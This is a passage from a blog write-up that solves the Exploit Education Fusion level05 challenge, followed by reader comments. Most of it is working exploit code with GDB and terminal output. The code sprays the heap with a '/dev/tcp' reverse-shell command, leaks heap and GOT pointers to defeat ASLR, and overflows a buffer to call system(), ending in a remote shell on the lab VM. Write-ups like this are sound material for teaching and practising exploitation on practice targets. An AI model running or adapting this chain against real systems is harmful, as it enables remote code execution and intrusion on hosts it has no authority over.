First, I’m going to find the system() and write() offsets:

# readelf -s /lib/i386-linux-gnu/libc-2.13.so | grep -E ' system@| write@'
  1409: 0003cb20   139 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
  2247: 000c12c0   128 FUNC    WEAK   DEFAULT   12 write@@GLIBC_2.0

A little hex math tells us that 0xc12c0 – 0x3cb20 = 0x847a0. So, whichever address we find for write(), we just need to subtract 0x847a0 from it in order to get the system() function address.
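The same calculation as a few lines of Python, in case you are working against a different libc and need to redo it with your own readelf output. The offsets are the ones from the readelf listing above; system_from_write is just an illustrative name.

```python
WRITE_OFFSET = 0x000c12c0    # write@@GLIBC_2.0 from readelf
SYSTEM_OFFSET = 0x0003cb20   # system@@GLIBC_2.0 from readelf


def system_from_write(write_addr):
    """Derive system()'s runtime address from a leaked write() address."""
    libc_base = write_addr - WRITE_OFFSET
    return libc_base + SYSTEM_OFFSET


print(hex(WRITE_OFFSET - SYSTEM_OFFSET))  # 0x847a0
```

A useful side check is that the computed libc base should be page-aligned (its low three hex digits are zero); if it isn't, the leaked address probably isn't write().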

The only reason this exploit will work is because the heap contains a few addresses to functions in our code, presumably because the chunk is not properly free’d. Let’s look for those. The steps I’m taking here:

  1. Print the address of the childtask() function
  2. Search for that address in memory
  3. Show the heap chunks (NOTE: If you do this after spraying the heap, it will take a LONG time and try to display ALL of the chunks. Hit Ctrl+C immediately after using the heap chunks command to get just the first few.)
  4. Get the difference of the address of the start of my heap spraying and the childtask() pointer location
  5. Divide that difference by 4
  6. Use the dereference command to show the last 34 word values of that large chunk before our heap spraying

gef➤  p childtask
$1 = {void (void *)} 0xb78d9c70 <childtask>

gef➤  search-pattern 0xb78d9c70
[+] Searching '\x70\x9c\x8d\xb7' in memory
[+] In (0xb76ed000-0xb772f000), permission=rw-
  0xb772d130 - 0xb772d140  →   "\x70\x9c\x8d\xb7[...]" 
[+] In '[heap]'(0xb8c14000-0xb8c35000), permission=rw-
  0xb8c1c6ec - 0xb8c1c6fc  →   "\x70\x9c\x8d\xb7[...]" 
  0xb8c1c840 - 0xb8c1c850  →   "\x70\x9c\x8d\xb7[...]" 
  0xb8c247c8 - 0xb8c247d8  →   "\x70\x9c\x8d\xb7[...]" 

gef➤  heap chunks 
Chunk(addr=0xb8c14008, size=0x108, flags=PREV_INUSE)
    [0xb8c14008     08 d0 6e b7 10 41 c1 b8 b0 c4 c1 b8 a0 4e c2 b8    ..n..A.......N..]
Chunk(addr=0xb8c14110, size=0x83a0, flags=PREV_INUSE)
    [0xb8c14110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb8c1c4b0, size=0x83a0, flags=PREV_INUSE)
    [0xb8c1c4b0     98 4e c2 b8 30 84 8a b7 00 00 00 00 00 00 00 00    .N..0...........]
Chunk(addr=0xb8c24850, size=0x10, flags=)
    [0xb8c24850     04 00 00 00 60 48 c2 b8 00 00 00 00 01 02 00 00    ....`H..........]
Chunk(addr=0xb8c24860, size=0x200, flags=PREV_INUSE)
    [0xb8c24860     41 42 43 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    ABC./bin/sh > /d]
...

gef➤  p/d 0xb8c24850 - 0xb8c247c8
$2 = 136

gef➤  p/d 136 / 4
$3 = 34

gef➤  dereference 0xb8c247c8 34
0xb8c247c8│+0x0000: 0xb78d9c70  →  <childtask+0> push ebp
0xb8c247cc│+0x0004: 0xb8c1c72c  →  0x00000000
0xb8c247d0│+0x0008: 0xb78e160c  →  0x00000000
0xb8c247d4│+0x000c: 0xb776c629  →  <swapcontext+89> pop ebx
0xb8c247d8│+0x0010: 0x00000002
0xb8c247dc│+0x0014: 0xb78dc349  →  <taskswitch+41> test eax, eax
0xb8c247e0│+0x0018: 0xb8c1c6c0  →  0x00000000
0xb8c247e4│+0x001c: 0xb78e15a0  →  0x00000000
0xb8c247e8│+0x0020: 0x00000000
0xb8c247ec│+0x0024: 0x00000000
0xb8c247f0│+0x0028: 0x00000000
0xb8c247f4│+0x002c: 0x00000000
0xb8c247f8│+0x0030: 0xb78dc380  →  <taskstart+0> sub esp, 0x1c
0xb8c247fc│+0x0034: 0xb776c5ab  →  <makecontext+75> lea esp, [esp+ebx*4]
0xb8c24800│+0x0038: 0x00000000
0xb8c24804│+0x003c: 0x00000000
...

You can see there are a couple of other function addresses in here. There’s no particular reason to use childtask() over the others.

Next, I’ll need to find the offset of the write@got.plt entry from childtask(). I’ll first ask GDB to print the address of write() in libc and search memory for that address. The match is the location in the .got.plt section that stores it. Then we just subtract the address of childtask() from the address of that .got.plt entry to find the offset. We can use this offset because the heap contains a pointer to childtask(), and that pointer is always at the same location (near the beginning of the heap):

gef➤  p write
$1 = {<text variable, no debug info>} 0xb76382c0 <write>

gef➤  search-pattern 0xb76382c0
[+] Searching '\xc0\x82\x63\xb7' in memory
[+] In '/opt/fusion/bin/level05'(0xb7726000-0xb7727000), permission=rw-
  0xb77261a8 - 0xb77261b8  →   "\xc0\x82\x63\xb7[...]" 

gef➤  p childtask
$2 = {void (void *)} 0xb7721c70 <childtask>

gef➤  p 0xb77261a8 - 0xb7721c70
$3 = 0x4538

This offset value will be the same each time the program is loaded into memory.

In summary, we’ll need to:

  1. Find childtask() pointer stored in the heap
  2. Find the write() function address stored in the .got.plt section
  3. Calculate the address to system()
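The three steps boil down to two pointer reads and some arithmetic. Here is a sketch of just the arithmetic, with the network part left out. The helper names are hypothetical, and the constants are the offsets measured above for this particular binary and libc.

```python
import struct

GOT_WRITE_FROM_CHILDTASK = 0x4538   # &write@got.plt - &childtask, from GDB
WRITE_TO_SYSTEM = 0x847a0           # write() - system() in this libc-2.13


def leaked_pointer(reply):
    """Read the first four bytes of a checkname reply as a little-endian pointer.

    The reply is produced with %s, so a pointer containing a null byte
    would arrive truncated and cannot be recovered this way.
    """
    return struct.unpack("<I", reply[:4])[0]


def write_got_address(childtask_addr):
    """Step 2: where to read write()'s resolved address from."""
    return childtask_addr + GOT_WRITE_FROM_CHILDTASK


def system_address(write_addr):
    """Step 3: system() sits a fixed distance below write()."""
    return write_addr - WRITE_TO_SYSTEM


childtask = leaked_pointer(b"\x70\x1c\x72\xb7 is not indexed already\n")
print(hex(childtask), hex(write_got_address(childtask)))  # 0xb7721c70 0xb77261a8
```

The example reply is made up to match the GDB session above, where childtask() was at 0xb7721c70 and write@got.plt at 0xb77261a8.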

Here’s the script I wrote to find the childtask() pointer in the heap and display the required addresses.

#!/usr/bin/env python3

from pwn import *
import time
import sys

##################
FD = 0xb97001b0  # Use the address found from leaking the file descriptor
##################
bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
content  = b"checkname "
content += b"A" * 32
align = 0x860
#context.log_level = 'DEBUG'


def send(read_ptr):
    payload  = content
    payload += p32(FD)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)


def bad(addr):
    # True if any byte of the packed address would cut the payload short
    return any(b in p32(addr) for b in bad_chars)


if bad(FD):
    log.error("File descriptor address contains a bad byte.")

io = remote("fusion", 20005)
log.info(io.recvline())
read = ((FD - align - 1) & 0xfffff000) + align
# Keep track of when the previous address contained a bad byte
prev_bad = False
log.info("Searching...")

while read > 0xb7000000:
    if bad(read):
        #log.failure(f"Bad byte found in address {read:#010x}")
        prev_bad = True
        read -= 0x1000
        continue

    time.sleep(0.005)
    data = send(read)

    if not data:
        log.error("No data received. Either the program crashed or you have a bad file descriptor address.")

    elif data[:3] == b"ABC":
        prev_inuse = send(read - 24)

        if prev_inuse[:2] == b"\xa0\x83":
            # childtask() ptr offset from start of user-supplied heap = -136 bytes
            childtask_str = send(read - 136)
            childtask = unpack(childtask_str[:4])
            write_str = send(childtask + 0x4538)
            write_addr = unpack(write_str[:4])
            log.info(f"Last address read: {read-136:#010x}")
            log.success(f"Found address to childtask(): {childtask:#010x}")
            log.success(f"   The write@got.plt address: {(childtask+0x4538):#010x}")
            log.success(f"   The address to write() is: {write_addr:#010x}")
            log.success(f"  The address to system() is: {(write_addr-0x847a0):#010x}")
            break

    elif data == b" is not indexed already\n" and prev_bad:
        log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                    "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it. "
                    "It is recommended to crash the program so you can start over.")
        log.warning("NOTE: You will need to spray the heap again")
        crash = input("Crash the program? [Y/n] ")

        if crash.lower() == "n":
            log.failure("Exiting")
            sys.exit(1)
        else:
            log.warning("OK, crashing the program")
            io.sendline(content + b"A"*12)
            sys.exit(1)

    elif data == b" is not indexed already\n" and not prev_bad:
        log.failure("We've hit a null region. Something went wrong.")
        log.info(f"Last address read: {read+0x1000:#010x}")
        sys.exit(1)

    read -= 0x1000
    prev_bad = False

This script took a lot of trial and error, and there’s probably a better way of doing it, but it works.

andrew ~/level05 $ ./find_system.py
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Searching...
[*] Last address read: 0xb876f7d8
[+] Found address to childtask(): 0xb7876c70
[+]    The write@got.plt address: 0xb787b1a8
[+]    The address to write() is: 0xb778d2c0
[+]   The address to system() is: 0xb7708b20
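To make the search loop a little easier to follow, here is a small stand-alone sketch of its two building blocks: the starting-address calculation and the bad-byte check. It uses struct in place of pwntools' p32() so it runs anywhere, and the function names first_read and has_bad_byte are mine, not from the script. Treat it as an illustration of the arithmetic rather than a replacement for the script.

```python
import struct

BAD_CHARS = (b"\x00", b"\x0a", b"\x0d", b"\x40")
ALIGN = 0x860  # page offset used by the search script


def p32(value):
    """Little-endian 32-bit pack, standing in for pwntools' p32()."""
    return struct.pack("<I", value)


def has_bad_byte(addr):
    """True if the packed address contains any byte from BAD_CHARS."""
    return any(c in p32(addr) for c in BAD_CHARS)


def first_read(fd_addr, align=ALIGN):
    """Highest address below fd_addr whose low 12 bits equal align."""
    return ((fd_addr - align - 1) & 0xfffff000) + align


start = first_read(0xb97001b0)
print(hex(start))

# The first few addresses the loop would probe, one page apart,
# with any address containing a bad byte filtered out
candidates = [start - i * 0x1000 for i in range(4)]
print([hex(a) for a in candidates if not has_bad_byte(a)])

# An address such as 0xb9400860 would be skipped because of the 0x40 byte
print(has_bad_byte(0xb9400860))
```

With the example FD value from the script, the first address probed is 0xb96ff860, and every later probe is exactly 0x1000 lower.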

Getting A Reverse Shell

Now that we have the address of the system() function, we can use the buffer overflow in the get_and_hash() function to take control of the program and execute our reverse shell string. It’s as simple as overwriting the saved EIP on the stack with the address of system() and supplying the address of our reverse shell string as its argument.

#!/usr/bin/env python3

from pwn import *
import sys

bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
def bad(addr):
    # True if the packed address contains any byte from bad_chars
    return any(c in p32(addr) for c in bad_chars)

###################
SYSTEM = 0xb7750b20
STRING = 0xb87c9864
###################
if bad(SYSTEM):
    log.failure("The system() address contains a bad byte. "
                "It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    crash = input("Crash the program? [Y/n] ")
    if crash.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        # Nothing is connected yet at this point, so open a connection first
        io = remote("fusion", 20005)
        io.recvline()
        io.sendline(b"checkname " + b"A" * 44)
        sys.exit(1)

content  = b"checkname "
content += b"A" * 44
content += p32(SYSTEM)
content += b"A" * 4
content += p32(STRING)

io = remote("fusion", 20005)
log.info(io.recvline())
l = listen(1337)
io.sendline(content)

l.wait_for_connection()
l.interactive()

andrew ~/level05 $ ./rshell.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[+] Trying to bind to :: on port 1337: Done
[+] Waiting for connections on :::1337: Got connection from ::ffff:10.0.1.5 on port 55669
[*] Switching to interactive mode
$ id
uid=20005 gid=20005 groups=20005
$
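For reference, the stack layout that rshell.py sends can be sketched without pwntools. This is only a picture of the payload bytes, assuming the 44-byte padding and the example SYSTEM and STRING values from the script above (both change on every run); build_payload is a name I made up for the illustration.

```python
import struct

SYSTEM = 0xb7750b20  # example value from rshell.py; differs per run
STRING = 0xb87c9864  # example value from rshell.py; differs per run


def build_payload(system, string, ret=b"AAAA"):
    """Lay out a return-to-libc frame after 44 bytes of padding."""
    payload = b"checkname "
    payload += b"A" * 44                  # filler up to the saved EIP
    payload += struct.pack("<I", system)  # saved EIP -> system()
    payload += ret                        # return address seen by system()
    payload += struct.pack("<I", string)  # first argument to system()
    return payload


payload = build_payload(SYSTEM, STRING)
body = payload[len(b"checkname "):]
print(len(body))
print(body[44:48].hex(), body[52:56].hex())
```

The 4 bytes between the two addresses are where system() will return to, which is why the combined script later swaps the filler for the address of exit().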

Conclusion

Wow, this was a long one. I did my best to explain everything as much as possible. Of course, some prerequisite knowledge is still required. But if you, dear reader, feel like I did a poor job at explaining something, leave a comment. It is my goal here to provide the best write-up possible.

Here’s a quick TLDR on what we did:

  • Spray the heap with a reverse shell string
    • Need enough to ensure we can start guessing at addresses and hit our data
    • This is only possible because the program does not properly free heap-allocated space
  • Use the BOF vulnerability in the get_and_hash() function to find a valid file descriptor address in our data
    • Using the checkname command will call this function
    • We’ll know we’ve hit a valid file descriptor (4) when we get a response from the server
  • This causes an information leak vulnerability that allows us to read data from the heap
    • The address pointing to the string returned to the client is right after the file descriptor on the stack
    • We keep stepping back & reading data from the heap all the way to the beginning
    • There are pointers to several functions in the level05 binary near the beginning of the heap
    • Leaking one of those addresses (childtask() is used here) allows us to defeat ASLR
  • Read the address of a libc function from the .got.plt section
    • The function used here is write(), and its .got.plt entry is at a constant offset from childtask()
    • Calculate the system() function address as it is a constant offset from write()
  • Utilize the BOF vulnerability to overwrite the saved EIP register with the address to system()
    • The next 4 bytes after that can be anything; however, it’s recommended to use the address of exit()
    • This prevents the program from causing a segfault when you quit the reverse shell
    • The last 4 bytes are the address to our reverse shell string as an argument to system()
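The address arithmetic in those last steps can be condensed into a few lines. The sketch below uses the three offsets that appear in the scripts in this write-up (0x4538, 0x847a0 and 0xa140), which are specific to this level05 binary and the libc on the Fusion VM. The resolve function and its read_u32 callback are hypothetical stand-ins for the checkname leak, and the fake memory holds values from the sample run shown earlier.

```python
# Offsets taken from the scripts in this write-up; they only apply to this
# particular level05 binary and libc build.
WRITE_GOT_FROM_CHILDTASK = 0x4538
SYSTEM_FROM_WRITE = -0x847a0
EXIT_FROM_SYSTEM = -0xa140


def resolve(childtask, read_u32):
    """Derive libc addresses from a leaked childtask() pointer.

    read_u32 is a hypothetical callback returning the 32-bit value stored
    at an address (in the real exploit this is the checkname leak).
    """
    write_got = childtask + WRITE_GOT_FROM_CHILDTASK
    write_addr = read_u32(write_got)
    system = write_addr + SYSTEM_FROM_WRITE
    return {
        "write_got": write_got,
        "write": write_addr,
        "system": system,
        "exit": system + EXIT_FROM_SYSTEM,
    }


# Fake memory built from the sample run: write@got.plt -> write()
memory = {0xb787b1a8: 0xb778d2c0}
addrs = resolve(0xb7876c70, memory.__getitem__)
for name, value in addrs.items():
    print(f"{name:>9}: {value:#010x}")
```

Only one pointer has to be leaked from the heap and one from the GOT; everything else follows from fixed offsets.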

One last thing to do is to put this all together into a single exploit script.

#!/usr/bin/env python3

from pwn import *
import time
import sys


def connect():
    io = remote("fusion", 20005)
    log.info(io.recvline())
    return io


### HEAP SPRAY #################################################################
def spray(io):
    buff_sz = 504
    command  = b"isup "
    content  = b"ABC "
    content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes
    content += b"A" * (buff_sz - len(content))
    content += pack(4)

    max_spray = 60222
    with log.progress('Spraying') as p:
        for i in range(max_spray):
            io.send(command + content)
            p.status(f"{(i/max_spray):.2%}")
            time.sleep(0.005)

    io.close()
    print()


### LEAK FILE DESCRIPTOR #######################################################
CHECKNAME  = b"checkname "
CHECKNAME += b"A" * 32

def leak_fd(io):
    print()
    start_addr = 0xb9700108

    log.info("Searching for a valid file descriptor...")
    for fd in range(start_addr, start_addr+528, 16):
        io.sendline(CHECKNAME + p32(fd))
        data = io.recvline(timeout=0.1)

        if b"indexed already" in data:
            log.success(f"File descriptor address: {fd:#010x}")
            string = fd + 28
            log.success(f"Reverse shell string at: {string:#010x}")
            break
    else:
        log.error("File descriptor address not found!")

    return fd, string


### FIND SYSTEM() ADDRESS ######################################################
def send(io, fd, read_ptr):
    payload  = CHECKNAME
    payload += p32(fd)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)


def crash(io):
    log.failure("It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    resp = input("Crash the program? [Y/n] ")
    if resp.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        io.sendline(CHECKNAME + b"A"*12)
        sys.exit(1)


def bad(addr):
    bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
    if any(bad in p32(addr) for bad in bad_chars):
        return True
    return False


def find_system(io, fd):
    print()
    # Keep track of when the previous address contained a bad byte
    prev_bad = False
    align = 0x860
    read = ((fd - align - 1) & 0xfffff000) + align
    log.info("Searching for system()...")

    while read > 0xb7000000:
        if bad(read):
            #log.failure(f"Bad byte found in address {read:#010x}")
            prev_bad = True
            read -= 0x1000
            continue

        time.sleep(0.005)
        data = send(io, fd, read)

        if not data:
            log.error("No data received. Either the program crashed or you have a bad file descriptor address.")

        elif data[:3] == b"ABC":
            prev_inuse = send(io, fd, read - 24)

            if prev_inuse[:2] == b"\xa0\x83":
                # childtask() ptr offset from start of user-supplied heap = -136 bytes
                childtask_str = send(io, fd, read - 136)
                childtask = unpack(childtask_str[:4])
                write_str = send(io, fd, childtask + 0x4538)
                write_addr = unpack(write_str[:4])
                system = write_addr - 0x847a0
                log.success(f"Address to childtask() stored at: {read-136:#010x}")
                log.success(f"          Address to childtask(): {childtask:#010x}")
                log.success(f"       The write@got.plt address: {childtask+0x4538:#010x}")
                log.success(f"       The address to write() is: {write_addr:#010x}")
                log.success(f"      The address to system() is: {system:#010x}")
                break

        elif data == b" is not indexed already\n" and prev_bad:
            log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                        "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it.")
            crash(io)

        elif data == b" is not indexed already\n" and not prev_bad:
            log.failure("We've hit a null region. Something went wrong.")
            log.info(f"Last address read: {read+0x1000:#010x}")
            sys.exit(1)

        read -= 0x1000
        prev_bad = False
    else:
        log.error("Something went wrong. Unable to find pointer to childtask() in the heap.")

    return system


### GET REVERSE SHELL ##########################################################
def rshell(io, system, string):
    print()
    if bad(system):
        log.failure("The system() address contains a bad byte")
        crash(io)

    EXIT = system - 0xa140

    payload  = CHECKNAME
    payload += b"A" * 12
    payload += p32(system)
    payload += p32(EXIT)
    payload += p32(string)

    l = listen(1337)
    io.sendline(payload)

    l.wait_for_connection()
    l.interactive()


if __name__ == "__main__":
    io = connect()
    spray(io)
    io = connect()
    fd, string = leak_fd(io)
    system = find_system(io, fd)
    rshell(io, system, string)
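If it helps to see what each sprayed line looks like, the sketch below rebuilds one of them using only the standard library. It mirrors the constants in spray() and uses struct.pack("<I", 4) as a stand-in for pwntools' pack(4), assuming the default 32-bit little-endian context; spray_line is a name I chose for the illustration.

```python
import struct

BUFF_SZ = 504
SHELL = b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; "


def spray_line():
    """Rebuild one sprayed 'isup' line the same way spray() does."""
    content = b"ABC " + SHELL
    content += b"A" * (BUFF_SZ - len(content))  # pad to 504 bytes
    content += struct.pack("<I", 4)             # file descriptor value 4
    return b"isup " + content


line = spray_line()
content = line[len(b"isup "):]
print(len(SHELL), len(content), len(line))
print(content.index(SHELL), content[504:].hex())
```

The "ABC " marker sits at offset 0 of the data following the command, the reverse shell string at offset 4, and the file descriptor value at offset 504.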

5 thoughts on “Exploit Education | Fusion | Level 05 Solution”

  1. duck says:

    > The comma operator in the for loop says to keep looping while i is less than maxsz OR while string[i] exists.

    Although it doesn’t matter for the exploitation, I just wanted to correct this. The comma operator returns only the last value of the expression, so it will keep looping while string[i] exists, completely ignoring maxsz.

    https://stackoverflow.com/questions/52550/what-does-the-comma-operator-do

    other than that great article

  2. Chicken says:

    Hey good solution! One question.

    How come you don’t overwrite the address on the heap storing the address isup, when performing your spray?

    Wouldn’t your ‘garbage’ data actually overwrite the contents of that address, so that later reading the address containing “isup” would return your garbage data?

    best regards.

  3. Christian Gabriel says:

    Love this breakdown. I’ll have to read this again. Really want to get to this level of pwn because it’s genuinely my favourite. What path do you recommend for learning how to read ASM?
